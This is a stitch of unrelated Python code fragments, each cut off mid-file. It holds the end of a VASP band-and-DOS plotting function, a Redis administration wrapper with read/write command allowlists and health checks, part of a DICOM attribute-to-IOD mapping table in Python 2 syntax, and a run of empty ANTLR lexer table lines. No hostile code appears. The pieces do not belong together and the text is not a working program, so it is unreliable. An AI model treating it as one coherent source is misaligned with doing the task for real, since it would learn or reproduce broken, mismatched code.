output='band_dos_element_orbitals.png',
spin='up',
scale_factor=6,
color_list=None,
legend=True,
linewidth=0.75,
band_color='black',
figsize=(6, 3),
width_ratios=[7, 3],
erange=[-6, 6],
hse=False,
kpath=None,
n=None,
fontsize=7,
save=True,
fill=True,
alpha=0.3,
sigma=0.05,
):
"""
This function generates a projected band structure on orbitals of specific elements next to a
projected density of states on the same orbitals for the same elements.
Parameters:
band_folder (str): This is the folder that contains the VASP files for the band structure
dos_folder (str): This is the folder that contains the VASP files for the density of states
output (str): File name of the resulting plot.
spin (str): Choose which spin direction to parse. ('up' or 'down')
scale_factor (float): Factor to scale weights. This changes the size of the
points in the scatter plot
element_orbital_pairs (list[list]): List of list in the form of
[[element symbol, orbital index], [element symbol, orbital_index], ...]
color_list (list): List of colors of the same length as the element_orbital_pairs
legend (bool): Determines if the legend should be included or not.
linewidth (float): Line width of the plain band structure plotted in the background
band_color (string): Color of the plain band structure
figsize (list / tuple): Desired size of the image in inches (width, height)
width_ratios (list / tuple): Width ration of the band plot and dos plot.
erange (list / tuple): Range of energy to show in the plot [low, high]
kpath (str): High symmetry k-point path of band structure calculation
Due to the nature of the KPOINTS file for HSE calculations this
information is a required input for proper labeling of the figure
for HSE calculations. This information is extracted from the KPOINTS
files for non-HSE calculations. (G is automaticall converted to \\Gamma)
n (int): Number of points between each high symmetry points.
This is also only required for HSE calculations. This number should be
known by the user, as it was used to generate the KPOINTS file.
fontsize (float): Font size of the text in the figure.
save (bool): Determines whether to automatically save the figure or not. If not
the figure and axis are return for further manipulation.
fill (bool): Determines wether or not to fill underneath the plot
alpha (float): Alpha value for the fill
sigma (float): Standard deviation for gaussian filter
Returns:
If save == True, this function will return nothing and directly save the image as
the output name. If save == False, the function will return the matplotlib figure
and axis for further editing.
"""
fig, ax = plt.subplots(
nrows=1,
ncols=2,
sharey=True,
figsize=figsize,
dpi=400,
gridspec_kw={'width_ratios': width_ratios}
)
ax1, ax2 = _figure_setup_band_dos(
ax=ax,
fontsize=fontsize,
ylim=[erange[0], erange[1]]
)
band = Band(
folder=band_folder,
spin=spin,
projected=True,
hse=hse,
kpath=kpath,
n=n,
)
dos = Dos(folder=dos_folder, spin=spin)
band.plot_element_orbitals(
ax=ax1,
scale_factor=scale_factor,
element_orbital_pairs=element_orbital_pairs,
color_list=color_list,
legend=False,
linewidth=linewidth,
band_color=band_color,
)
dos.plot_element_orbitals(
ax=ax2,
element_orbital_pairs=element_orbital_pairs,
fill=fill,
alpha=alpha,
linewidth=linewidth,
sigma=sigma,
energyaxis='y',
color_list=color_list,
legend=legend,
total=True,
erange=erange,
)
fig.canvas.draw()
nbins = len(ax2.get_xticklabels())
ax2.xaxis.set_major_locator(MaxNLocator(nbins=nbins - 1, prune='lower'))
plt.tight_layout(pad=0.2)
plt.subplots_adjust(wspace=0)
if save:
plt.savefig(output)
else:
return fig, ax1, ax2
def band_dos_plain_spin_polarized(
band_folder,
dos_folder,
output='band_dos_plain_sp.png',
up_color='black',
down_color='red',
linewidth=1.25,
up_linestyle='-',
| |
<filename>yasql/apps/redisms/redisApi.py
# -*— coding: utf-8 -*-
# __author__ : pandonglin
import redis, time
REDIS_READ_CMDS = [ # 查redis询命令列表
"help",
"info",
"exists",
"keys",
"type",
"ttl",
"scan",
"get",
"mget",
"strlen",
"hexists",
"hget",
"hlen",
"hmget",
"hvals",
"hscan",
"lindex",
"llen",
"lrange",
"scard",
"sismember",
"smembers",
"srandmember",
"sscan",
"zcard",
"zcount",
"zrange",
"zrangebyscore",
"zrank",
"zrevrange",
"zrevrangebyscore",
"zrevrank",
"zscore",
"zscan",
]
REDIS_WRITE_CMDS = [ # 写redis命令列表,不包含删除动作的命令
"set",
"setex",
"setnx",
"hset",
"hsetnx",
"lpush",
"lpushx",
"rpush",
"rpushx",
"sadd",
"zadd",
]
REDIS_CMDS = REDIS_READ_CMDS + REDIS_WRITE_CMDS
class RedisApi:
def __init__(self, host, port, db=0, password=None):
self.host = host
self.port = port
self.db = db
self.password = password
self.conn = self.get_conn()
def get_conn(self):
conn = redis.Redis(self.host, self.port, self.db, password=self.password,
socket_timeout=15, socket_connect_timeout=3, decode_responses=True)
try:
conn.ping()
except Exception as err:
raise Exception("can't connect redis")
return conn
def check_ping(self):
conn = redis.Redis(self.host, self.port, password=self.password,
socket_timeout=15, socket_connect_timeout=3, decode_responses=True)
try:
conn.ping()
except Exception as err:
return [{"status": "fatal", "msg": "can't connect redis"}]
def persistence(self):
"""数据持久检查"""
data = []
result = self.conn.info()
rdb_last_bgsave_status = result.get("rdb_last_bgsave_status", None)
if rdb_last_bgsave_status != "ok":
data.append({"status": "err", "msg": "rdb bgsave error"})
append_only = self.get_config("appendonly")
if not append_only:
data.append({"status": "fatal", "msg": "aof is disabled"})
else:
aof_last_bgrewrite_status = result.get("aof_last_bgrewrite_status", None)
if aof_last_bgrewrite_status != "ok":
data.append({"status": "err", "msg": "aof bgrewrite error"})
return data
def cluster_status(self):
"""TODO:集群状态 """
data = []
return data
def metrics(self):
"""通用指标"""
data = []
result = self.conn.info()
# 内存使用
max_memory = result.get("max_memory", None) or result.get("total_system_memory", None)
used_memory = result.get("used_memory", 0)
used_memory_percent = float(used_memory) / max_memory if max_memory else 0
if used_memory_percent > 0.8:
data.append({"status": "warning", "msg": "current redis memory usage > 80%"})
used_memory_peak = result.get("used_memory_peak", 0)
used_memory_peak_percent = float(used_memory_peak) / max_memory if max_memory else 0
if used_memory_peak_percent > 0.9:
data.append({"status": "err", "msg": "redis memory peak usage > 90%"})
# 连接数
connected_client = result.get("connected_clients", 0)
max_connect = self.get_config("maxclients").get("maxclients")
used_connect_percent = float(connected_client) / int(max_connect) if max_connect.isdigit() else 1
if used_connect_percent > 0.8:
data.append({"status": "warning", "msg": "client connect usage > 80%"})
# qps
qps = result.get("instantaneous_ops_per_sec", 0)
if qps > 60000:
data.append({"status": "fatal", "msg": "qps usage > 60000"})
return data
def bulk_ops(self):
"""set/get"""
k = "<KEY>" # 测试key
data = []
try:
if self.conn.set(k, "1", ex=3):
v = self.conn.get(k)
if v != "1":
data.append({"status": "err", "msg": "redis can't read"})
else:
data.append({"status": "err", "msg": "redis can't write"})
except Exception as err:
data.append({"status": "err", "msg": err})
return data
def get_monitor(self):
"""监控执行命令"""
data = []
start_at = time.time()
try:
with self.conn.monitor() as m:
for command in m.listen():
data.append(command)
used_time = time.time() - start_at
if len(data) > 500 or used_time > 10: # 最多取500条monitor数据 或者收集超过10s
break
except Exception as err:
pass
return data
def get_metrics(self, db):
"""监控指标"""
result1 = self.conn.info()
time.sleep(1)
result2 = self.conn.info()
slowlog = self.read_slowlog_len()
data = {
"version": result1.get("redis_version"),
"run_time": "%s days" % result1.get("uptime_in_days", 0),
"connected_client": result1.get("connected_clients", 0),
"blocked_client": result1.get("blocked_clients", 0),
"redis_mode": result1.get("redis_mode"),
"total_memory": result1.get("total_system_memory_human", 0),
"used_memory": result1.get("used_memory_human", 0),
"max_memory": result1.get("max_memory", 0),
"used_cpu_sys": float('%.2f' % (result2.get("used_cpu_sys") - result1.get("used_cpu_sys"))),
"used_cpu_user": float('%.2f' % (result2.get("used_cpu_user") - result1.get("used_cpu_user"))),
"key_hits": result1.get("keyspace_hits"),
"key_misses": result1.get("keyspace_misses"),
"qps": result1.get("instantaneous_ops_per_sec"),
"slowlog_num": slowlog,
"keys": result1.get(db),
}
return data
def get_config(self, conf_arg):
"""获取配置信息"""
if conf_arg:
try:
r = self.conn.config_get(conf_arg)
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'config' command"
def read_help(self, args_list):
if len(args_list) == 0:
return REDIS_CMDS
else:
return "ERR wrong number of arguments for 'help' command"
def read_info(self, args_list):
if len(args_list) == 0:
return self.conn.info()
else:
return "ERR wrong number of arguments for 'info' command"
def read_slowlog_len(self):
"""获取慢日志数量"""
return self.conn.slowlog_len()
def read_exists(self, args_list):
"""检查给定 key 是否存在"""
if len(args_list) == 1:
try:
r = self.conn.exists(args_list[0])
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'exists' command"
def read_keys(self, args_list):
"""查找所有符合给定模式 pattern 的 key"""
if len(args_list) == 1 and args_list[0] != "*":
try:
r = self.conn.keys(args_list[0])
except Exception as err:
r = str(err)
return r
else:
return " 'keys' command must have pattern,and pattern can't be '*' "
def read_type(self, args_list):
"""返回 key 所储存的值的类型"""
if len(args_list) == 1:
return self.conn.type(args_list[0])
else:
return "ERR wrong number of arguments for 'type' command"
def read_ttl(self, args_list):
"""返回 过期时间"""
if len(args_list) == 1:
return self.conn.ttl(args_list[0])
else:
return "ERR wrong number of arguments for 'ttl' command"
def read_scan(self, args_list):
"""SCAN 命令及其相关的 SSCAN 命令、 HSCAN 命令和 ZSCAN 命令都用于增量地迭代(incrementally iterate)一集元素(a collection of elements"""
try:
if len(args_list) == 1:
r = self.conn.scan(args_list[0])
elif len(args_list) > 1 and len(args_list) % 2 != 0:
args = args_list[1:]
d = {}
for i in range(len(args)):
if args[i].upper() == 'MATCH':
d['match'] = args[i+1]
elif args[i].upper() == 'COUNT':
d['count'] = args[i+1]
r = self.conn.scan(args_list[0], **d)
else:
r = "ERR wrong arguments for 'scan' command"
except Exception as err:
r = str(err)
return r
def read_get(self, args_list):
"""返回 key 所关联的字符串值"""
if len(args_list) == 1:
try:
r = self.conn.get(args_list[0])
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'get' command"
def read_mget(self, args_list):
"""返回所有(一个或多个)给定 key 的值"""
if len(args_list) >= 1:
try:
r = self.conn.mget(args_list)
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'mget' command"
def read_strlen(self, args_list):
"""返回 key 所储存的字符串值的长度"""
if len(args_list) == 1:
try:
r = self.conn.strlen(args_list[0])
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'strlen' command"
def read_hexists(self, args_list):
"""查看哈希表 key 中,给定域 field 是否存在"""
if len(args_list) == 2:
try:
r = self.conn.hexists(*args_list)
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'hexists' command"
def read_hget(self, args_list):
"""返回哈希表 key 中给定域 field 的值"""
if len(args_list) == 2:
try:
r = self.conn.hget(*args_list)
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'hget' command"
def read_hlen(self, args_list):
"""返回哈希表 key 中域的数量"""
if len(args_list) == 1:
try:
r = self.conn.hlen(args_list[0])
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'hlen' command"
def read_hmget(self, args_list):
"""返回哈希表 key 中,一个或多个给定域的值"""
if len(args_list) >= 1:
try:
r = self.conn.hmget(args_list[0], args_list[1:])
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'hmget' command"
def read_hvals(self, args_list):
"""返回哈希表 key 中所有域的值"""
if len(args_list) == 1:
try:
r = self.conn.hvals(args_list[0])
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'hvals' command"
def read_hscan(self, args_list):
"""用于增量地迭代"""
try:
if len(args_list) == 2:
r = self.conn.hscan(args_list[0], args_list[1])
elif len(args_list) > 2 and len(args_list) % 2 == 0:
args = args_list[2:]
d = {}
for i in range(len(args)):
if args[i].upper() == 'MATCH':
d['match'] = args[i+1]
elif args[i].upper() == 'COUNT':
d['count'] = args[i+1]
r = self.conn.hscan(args_list[0], args_list[1], **d)
else:
r = "ERR wrong arguments for 'hscan' command"
except Exception as err:
r = str(err)
return r
def read_lindex(self, args_list):
"""返回列表 key 中,下标为 index 的元素"""
if len(args_list) == 2:
try:
r = self.conn.lindex(*args_list)
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'lindex' command"
def read_llen(self, args_list):
"""返回列表 key 的长度"""
if len(args_list) == 1:
try:
r = self.conn.llen(args_list[0])
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'llen' command"
def read_lrange(self, args_list):
"""返回列表 key 中指定区间内的元素,区间以偏移量 start 和 stop 指定"""
if len(args_list) == 3:
try:
r = self.conn.lrange(*args_list)
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'lrange' command"
def read_scard(self, args_list):
"""返回集合 key 的基数(集合中元素的数量)"""
if len(args_list) == 1:
try:
r = self.conn.scard(args_list[0])
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'scard' command"
def read_sismember(self, args_list):
"""判断 member 元素是否集合 key 的成员"""
if len(args_list) == 2:
try:
r = self.conn.sismember(*args_list)
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'sismember' command"
def read_smembers(self, args_list):
"""返回集合 key 中的所有成员"""
if len(args_list) == 1:
try:
r = self.conn.smembers(args_list[0])
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of | |
IMAGE IOD': ['Image'],
'XRF IMAGE IOD': ['Image'],
'DIGITAL X-RAY IMAGE IOD': ['Image'],
'RT IMAGE IOD': ['Image'],
'CR IMAGE IOD': ['Image'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Image'],
},
# ReferencedDateTime
0x0040A13AL: {
'SPECTACLE PRESCIPTION REPORT IOD': ['Document'],
'KEY OBJECT SELECTION DOCUMENT IOD': ['Document'],
'MAMMOGRAPHY CAD SR IOD': ['Document'],
'BASIC TEXT SR IOD': ['Document'],
'X-RAY RADIATION DOSE SR IOD': ['Document'],
'PROCEDURE LOG IOD': ['Document'],
'ENHANCED SR IOD': ['Document'],
'CHEST CAD SR IOD': ['Document'],
'MACULAR GRID THIICKNESS AND VOLUME REPORT IOD': ['Document'],
None: ['Document'],
'IMPLANTATION PLAN SR DOCUMENT IOD': ['Document'],
'COMPREHENSIVE SR IOD': ['Document'],
'COLON CAD SR IOD': ['Document'],
},
# PhototimerSetting
0x00187065L: {
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Image'],
'DIGITAL X-RAY IMAGE IOD': ['Image'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Image'],
None: ['Image'],
},
# ScatterCorrected
0x00189760L: {
'ENHANCED PET IMAGE IOD': ['Image'],
None: ['Image'],
},
# ImplantAssemblyTemplateIssuer
0x00760003L: {
'IMPLANT ASSEMBLY TEMPLATE IOD': ['Implant Assembly'],
None: ['Implant Assembly'],
},
# GantryMotionCorrected
0x00189762L: {
'ENHANCED PET IMAGE IOD': ['Image'],
None: ['Image'],
},
# PatientMotionCorrected
0x00189763L: {
'ENHANCED PET IMAGE IOD': ['Image'],
None: ['Image'],
},
# ClinicalTrialProtocolID
0x00120020L: {
'BASIC STRUCTURED DISPLAY IOD': ['Patient'],
'MULTI-FRAME TRUE COLOR SC IMAGE IOD': ['Patient'],
'RT BRACHY TREATMENT RECORD IOD': ['Patient'],
'RT STRUCTURE SET IOD': ['Patient'],
'RT PLAN IOD': ['Patient'],
'CR IMAGE IOD': ['Patient'],
'RAW DATA IOD': ['Patient'],
'MACULAR GRID THIICKNESS AND VOLUME REPORT IOD': ['Patient'],
'ENHANCED MR IMAGE IOD': ['Patient'],
'BASIC CARDIAC EP IOD': ['Patient'],
'RT TREATMENT SUMMARY RECORD IOD': ['Patient'],
'12-LEAD ECG IOD': ['Patient'],
'RESPIRATORY WAVEFORM IOD': ['Patient'],
'VL SLIDE-COORDINATES MICROSCOPIC IMAGE IOD': ['Patient'],
'BREAST TOMOSYNTHESIS IMAGE IOD': ['Patient'],
'BASIC VOICE AUDIO IOD': ['Patient'],
'OPHTHALMIC PHOTOGRAPHY 16 BIT IMAGE IOD': ['Patient'],
'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Patient'],
'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Patient'],
'MULTI-FRAME GRAYSCALE WORD SC IMAGE IOD': ['Patient'],
'SPECTACLE PRESCIPTION REPORT IOD': ['Patient'],
'BASIC TEXT SR IOD': ['Patient'],
'NM IMAGE IOD': ['Patient'],
'BLENDING SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'LENSOMETRY MEASUREMENTS IOD': ['Patient'],
'MR SPECTROSCOPY IOD': ['Patient'],
'ENCAPSULATED PDF IOD': ['Patient'],
'X-RAY 3D ANGIOGRAPHIC IMAGE IOD': ['Patient'],
'CHEST CAD SR IOD': ['Patient'],
'HEMODYNAMIC IOD': ['Patient'],
'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Patient'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Patient'],
'VIDEO MICROSCOPIC IMAGE IOD': ['Patient'],
'ENHANCED MR COLOR IMAGE IOD': ['Patient'],
'ENHANCED CT IMAGE IOD': ['Patient'],
'X-RAY RADIATION DOSE SR IOD': ['Patient'],
'AUTOREFRACTION MEASUREMENTS IOD': ['Patient'],
'PROCEDURE LOG IOD': ['Patient'],
'IMPLANTATION PLAN SR DOCUMENT IOD': ['Patient'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Patient'],
'STEREOMETRIC RELATIONSHIP IOD': ['Patient'],
'INTRAOCULAR LENS CALCULATIONS IOD': ['Patient'],
'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Patient'],
'VL ENDOSCOPIC IMAGE IOD': ['Patient'],
'KERATOMETRY MEASUREMENTS IOD': ['Patient'],
'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Patient'],
'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Patient'],
'COMPREHENSIVE SR IOD': ['Patient'],
'ENHANCED ULTRASOUND VOLUME IOD': ['Patient'],
'KEY OBJECT SELECTION DOCUMENT IOD': ['Patient'],
'SPATIAL FIDUCIALS IOD': ['Patient'],
'RT ION PLAN IOD': ['Patient'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Patient'],
'CT IMAGE IOD': ['Patient'],
'VL WHOLE SLIDE MICROSCOPY IOD': ['Patient'],
'RT ION BEAMS TREATMENT RECORD IOD': ['Patient'],
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Patient'],
'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'RT DOSE IOD': ['Patient'],
'AMBULATORY ECG IOD': ['Patient'],
'SURFACE SEGMENTATION IOD': ['Patient'],
'MAMMOGRAPHY CAD SR IOD': ['Patient'],
'VL MICROSCOPIC IMAGE IOD': ['Patient'],
'RT BEAMS TREATMENT RECORD IOD': ['Patient'],
'DEFORMABLE SPATIAL REGISTRATION IOD': ['Patient'],
'VIDEO PHOTOGRAPHIC IMAGE IOD': ['Patient'],
'RT IMAGE IOD': ['Patient'],
'SC IMAGE IOD': ['Patient'],
None: ['Patient'],
'SEGMENTATION IOD': ['Patient'],
'PET IMAGE IOD': ['Patient'],
'PSEUDO-COLOR SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'DIGITAL X-RAY IMAGE IOD': ['Patient'],
'REAL WORLD VALUE MAPPING IOD': ['Patient'],
'SPATIAL REGISTRATION IOD': ['Patient'],
'COLON CAD SR IOD': ['Patient'],
'INTRAVASCULAR OCT IMAGE IOD': ['Patient'],
'COLOR SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'ENHANCED PET IMAGE IOD': ['Patient'],
'VISUAL ACUITY MEASUREMENTS IOD': ['Patient'],
'US MULTI-FRAME IMAGE IOD': ['Patient'],
'ENHANCED X-RAY RF IMAGE IOD': ['Patient'],
'RT BEAMS DELIVERY INSTRUCTION IOD': ['Patient'],
'SUBJECTIVE REFRACTION MEASUREMENTS IOD': ['Patient'],
'US IMAGE IOD': ['Patient'],
'GENERAL ECG IOD': ['Patient'],
'XRF IMAGE IOD': ['Patient'],
'ENCAPSULATED CDA IOD': ['Patient'],
'ENHANCED SR IOD': ['Patient'],
'VL PHOTOGRAPHIC IMAGE IOD': ['Patient'],
'GENERAL AUDIO WAVEFORM IOD': ['Patient'],
'MR IMAGE IOD': ['Patient'],
'OPHTHALMIC TOMOGRAPHY IMAGE IOD': ['Patient'],
'VIDEO ENDOSCOPIC IMAGE IOD': ['Patient'],
'ARTERIAL PULSE WAVEFORM IOD': ['Patient'],
},
# ReferencedTreatmentRecordSequence
0x30080030L: {
'RT BEAMS TREATMENT RECORD IOD': ['Treatment Record'],
'RT BRACHY TREATMENT RECORD IOD': ['Treatment Record'],
'RT ION BEAMS TREATMENT RECORD IOD': ['Treatment Record'],
'RT TREATMENT SUMMARY RECORD IOD': ['Treatment Record'],
None: ['Treatment Record'],
},
# NonUniformRadialSamplingCorrected
0x00189766L: {
'ENHANCED PET IMAGE IOD': ['Image'],
None: ['Image'],
},
# CatheterDirectionOfRotation
0x00520031L: {
'INTRAVASCULAR OCT IMAGE IOD': ['Image'],
None: ['Image'],
},
# DetectorNormalizationCorrection
0x00189768L: {
'ENHANCED PET IMAGE IOD': ['Image'],
None: ['Image'],
},
# KSpaceFiltering
0x00189064L: {
'ENHANCED MR COLOR IMAGE IOD': ['Image'],
'MR SPECTROSCOPY IOD': ['Equipment'],
'ENHANCED MR IMAGE IOD': ['Image'],
None: ['Image', 'Equipment'],
},
# AttenuationCorrectionTemporalRelationship
0x00189770L: {
'ENHANCED PET IMAGE IOD': ['Image'],
None: ['Image'],
},
# NumberOfTemporalPositions
0x00200105L: {
'MR IMAGE IOD': ['Image'],
None: ['Image'],
},
# PerformedProtocolType
0x00400261L: {
'ENHANCED ULTRASOUND VOLUME IOD': ['Series'],
None: ['Series'],
},
# RangingDepth
0x00520009L: {
'INTRAVASCULAR OCT IMAGE IOD': ['Image'],
None: ['Image'],
},
# ExposureTimeInuS
0x00188150L: {
None: ['Image'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Image'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Image'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Image'],
'DIGITAL X-RAY IMAGE IOD': ['Image'],
'XRF IMAGE IOD': ['Image'],
},
# NumberOfCopies
0x20000010L: {
'MEDIA CREATION MANAGEMENT IOD': ['Media Creation Management'],
'FILM SESSION IOD': ['Film Session'],
None: ['Film Session', 'Media Creation Management'],
},
# CorrectedLocalizedDeviationFromNormalCalculated
0x00240078L: {
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Measurements'],
None: ['Measurements'],
},
# AdmissionID
0x00380010L: {
'BASIC STRUCTURED DISPLAY IOD': ['Study'],
'MULTI-FRAME TRUE COLOR SC IMAGE IOD': ['Study'],
'RT BRACHY TREATMENT RECORD IOD': ['Study'],
'RT STRUCTURE SET IOD': ['Study'],
'RT PLAN IOD': ['Study'],
'CR IMAGE IOD': ['Study'],
'RAW DATA IOD': ['Study'],
'MACULAR GRID THIICKNESS AND VOLUME REPORT IOD': ['Study'],
'ENHANCED MR IMAGE IOD': ['Study'],
'UNIFIED PROCEDURE STEP IOD': ['Unified Procedure Step'],
'BASIC CARDIAC EP IOD': ['Study'],
'RT TREATMENT SUMMARY RECORD IOD': ['Study'],
'12-LEAD ECG IOD': ['Study'],
'RESPIRATORY WAVEFORM IOD': ['Study'],
'VL SLIDE-COORDINATES MICROSCOPIC IMAGE IOD': ['Study'],
'BREAST TOMOSYNTHESIS IMAGE IOD': ['Study'],
'BASIC VOICE AUDIO IOD': ['Study'],
'OPHTHALMIC PHOTOGRAPHY 16 BIT IMAGE IOD': ['Study'],
'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Study'],
'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Study'],
'MULTI-FRAME GRAYSCALE WORD SC IMAGE IOD': ['Study'],
'SPECTACLE PRESCIPTION REPORT IOD': ['Study'],
'BASIC TEXT SR IOD': ['Study'],
'NM IMAGE IOD': ['Study'],
'BLENDING SOFTCOPY PRESENTATION STATE IOD': ['Study'],
'LENSOMETRY MEASUREMENTS IOD': ['Study'],
'MR SPECTROSCOPY IOD': ['Study'],
'ENCAPSULATED PDF IOD': ['Study'],
'X-RAY 3D ANGIOGRAPHIC IMAGE IOD': ['Study'],
'CHEST CAD SR IOD': ['Study'],
'HEMODYNAMIC IOD': ['Study'],
'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Study'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Study'],
'VIDEO MICROSCOPIC IMAGE IOD': ['Study'],
'ENHANCED MR COLOR IMAGE IOD': ['Study'],
'ENHANCED CT IMAGE IOD': ['Study'],
'X-RAY RADIATION DOSE SR IOD': ['Study'],
'AUTOREFRACTION MEASUREMENTS IOD': ['Study'],
'IMPLANTATION PLAN SR DOCUMENT IOD': ['Study'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Study'],
'STEREOMETRIC RELATIONSHIP IOD': ['Study'],
'INTRAOCULAR LENS CALCULATIONS IOD': ['Study'],
'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Study'],
'VL ENDOSCOPIC IMAGE IOD': ['Study'],
'KERATOMETRY MEASUREMENTS IOD': ['Study'],
'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Study'],
'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Study'],
'COMPREHENSIVE SR IOD': ['Study'],
'ENHANCED ULTRASOUND VOLUME IOD': ['Study'],
'KEY OBJECT SELECTION DOCUMENT IOD': ['Study'],
'SPATIAL FIDUCIALS IOD': ['Study'],
'RT ION PLAN IOD': ['Study'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Study'],
'CT IMAGE IOD': ['Study'],
'VL WHOLE SLIDE MICROSCOPY IOD': ['Study'],
'RT ION BEAMS TREATMENT RECORD IOD': ['Study'],
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Study'],
'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Study'],
'RT DOSE IOD': ['Study'],
'GENERAL PURPOSE PERFORMED PROCEDURE STEP IOD': ['General Purpose Performed Procedure Step'],
'AMBULATORY ECG IOD': ['Study'],
'SURFACE SEGMENTATION IOD': ['Study'],
'MAMMOGRAPHY CAD SR IOD': ['Study'],
'VL MICROSCOPIC IMAGE IOD': ['Study'],
'RT BEAMS TREATMENT RECORD IOD': ['Study'],
'DEFORMABLE SPATIAL REGISTRATION IOD': ['Study'],
'VIDEO PHOTOGRAPHIC IMAGE IOD': ['Study'],
'RT IMAGE IOD': ['Study'],
'SC IMAGE IOD': ['Study'],
None: ['Study', 'Unified Procedure Step', 'General Purpose Performed Procedure Step'],
'SEGMENTATION IOD': ['Study'],
'PET IMAGE IOD': ['Study'],
'PSEUDO-COLOR SOFTCOPY PRESENTATION STATE IOD': ['Study'],
'DIGITAL X-RAY IMAGE IOD': ['Study'],
'REAL WORLD VALUE MAPPING IOD': ['Study'],
'SPATIAL REGISTRATION IOD': ['Study'],
'COLON CAD SR IOD': ['Study'],
'INTRAVASCULAR OCT IMAGE IOD': ['Study'],
'COLOR SOFTCOPY PRESENTATION STATE IOD': ['Study'],
'GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Study'],
'ENHANCED PET IMAGE IOD': ['Study'],
'VISUAL ACUITY MEASUREMENTS IOD': ['Study'],
'US MULTI-FRAME IMAGE IOD': ['Study'],
'ENHANCED X-RAY RF IMAGE IOD': ['Study'],
'RT BEAMS DELIVERY INSTRUCTION IOD': ['Study'],
'SUBJECTIVE REFRACTION MEASUREMENTS IOD': ['Study'],
| |
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
